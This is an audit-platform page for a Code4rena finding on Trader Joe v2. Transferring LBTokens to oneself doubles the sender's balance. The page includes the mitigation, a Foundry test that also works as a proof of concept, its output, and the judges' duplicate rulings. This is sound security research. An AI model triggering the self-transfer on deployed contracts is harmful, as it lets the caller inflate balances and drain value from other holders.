Back to bitbopper's contests

Trader Joe v2 contest - bitbopper's results

One-stop-shop decentralized trading on Avalanche.

General Information

Platform: Code4rena

Start Date: 14/10/2022

Pot Size: $100,000 USDC

Total HM: 12

Participants: 75

Period: 9 days

Judge: GalloDaSballo

Total Solo HM: 1

Id: 171

League: ETH

Trader Joe

Findings Distribution

Researcher Performance

Rank: 57/75

Findings: 1

Award: $0.33

🌟 Selected for report: 0

🚀 Solo Findings: 0

External Links

Code4rena Contest PageGithub Contest RepositoryGithub Findings RepositoryTrader Joe

Findings Information

🌟 Selected for report: Dravee

Also found by: 8olidity, JMukesh, Lambda, Randyyy, RaoulSchaffranek, SEVEN, Tutturu, __141345__, bitbopper, cccz, hansfriese, hxzy, ne0n, neumo, parashar, phaze, saian

Awards

0.3268 USDC - $0.33

Labels

bug
3 (High Risk)
satisfactory
duplicate-299

External Links

Link to GitHub issue

Link to code

https://github.com/code-423n4/2022-10-traderjoe/blob/79f25d48b907f9d0379dd803fc2abc9c5f57db93/src/LBToken.sol#L176::L196

Impact

When a malicious user decides to send LBTokens to their own address they will increase their own balance by the sent amount. Vulnerable function _transfer is reachable via the public functions safeBatchTransferFrom and safeTransferFrom.

L187 effectively saves _toBalance before _fromBalance is adjusted. If _from == _to attackers can effectively double their balance. The step can be endlessly repeated and leads to complete loss of value of whatever the LBToken represents.

Proof of concept

See recommended mitigation.

Recommended Mitigation Steps

Ensure that _from != _to in _transfer function. Add below code to test/LBToken.t.sol in order to catch regressions once the bug is fixed (test also works as proof of concept).

Code

function testSafeTransferFromToSelf() public {
    uint256 amountIn = 1e18;
    (uint256[] memory _ids, , , ) = addLiquidity(amountIn, ID_ONE, 5, 0);

    uint balance_amount_pre = pair.balanceOf(DEV, _ids[0]);
    pair.safeTransferFrom(DEV, DEV, _ids[0], balance_amount_pre);
    uint balance_amount_pos = pair.balanceOf(DEV, _ids[0]);

    if (balance_amount_pre != balance_amount_pos) {
        emit log_named_string("FAIL", "transfer to self increases balance");
        emit log_named_uint("balance before transfer", balance_amount_pre);
        emit log_named_uint("balance after  transfer", balance_amount_pos);
        emit log_named_uint("balance        increase", balance_amount_pos-balance_amount_pre);
    }

    assertEq(balance_amount_pos, balance_amount_pre);
}

Output

Running 1 test for test/LBToken.t.sol:LiquidityBinTokenTest
[FAIL. Reason: Undefined.] testSafeTransferFromToSelf() (gas: 1015343)
Logs:
  FAIL: transfer to self increases balance
  balance before transfer: 333333333333333333
  balance after  transfer: 666666666666666666
....

#0 - itsmetechjay

2022-10-24T16:24:53Z

Warden submitted issue via email to sockdrawermoney prior to contest close due to login issues over the weekend

#1 - Shungy

2022-10-25T04:59:06Z

Duplicate: https://github.com/code-423n4/2022-10-traderjoe-findings/issues/266

#2 - GalloDaSballo

2022-10-26T16:35:12Z

Dup of https://github.com/code-423n4/2022-10-traderjoe-findings/issues/299

#3 - c4-judge

2022-11-23T18:28:06Z

GalloDaSballo marked the issue as not a duplicate

#4 - c4-judge

2022-11-23T18:28:21Z

GalloDaSballo marked the issue as duplicate of #299

#5 - Simon-Busch

2022-12-05T06:38:22Z

Marked this issue as Satisfactory as requested by @GalloDaSballo

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built bymalatrax © 2024

Auditors

Browse

Contests

Browse

Get in touch

ContactTwitter